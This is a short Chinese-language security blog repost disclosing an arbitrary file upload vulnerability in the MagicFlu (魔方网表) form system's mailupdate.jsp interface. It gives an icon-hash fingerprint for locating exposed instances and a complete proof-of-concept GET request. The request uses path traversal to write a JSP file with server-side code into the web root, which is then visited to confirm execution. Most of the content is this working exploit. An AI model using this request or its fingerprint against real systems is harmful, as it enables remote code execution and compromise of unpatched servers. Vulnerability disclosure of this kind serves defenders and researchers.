魔方网表存在文件上传漏洞

admin 2024年4月20日16:07:40评论50 views字数 460阅读1分32秒阅读模式

魔方网表 mailupdate.jsp接口 任意文件上传漏洞@Rabbit

https://wiki.shikangsi.com/post/4084/

漏洞描述

魔方网表mailupdate.jsp接口存在任意文件上传漏洞

资产测绘

icon_hash="694014318"

POC

GET /magicflu/html/mail/mailupdate.jsp?messageid=/../../../test1.jsp&messagecontent=%3C%25+out.println%28%22tteesstt1%22%29%3B%25%3E HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeHost: 127.0.0.1

上传后访问/magicflu/test1.jsp

魔方网表存在文件上传漏洞

阅读原文,查看更多。

原文始发于微信公众号(墨雪飘影):魔方网表存在文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月20日16:07:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   魔方网表存在文件上传漏洞http://cn-sec.com/archives/2675379.html

发表评论

匿名网友 填写信息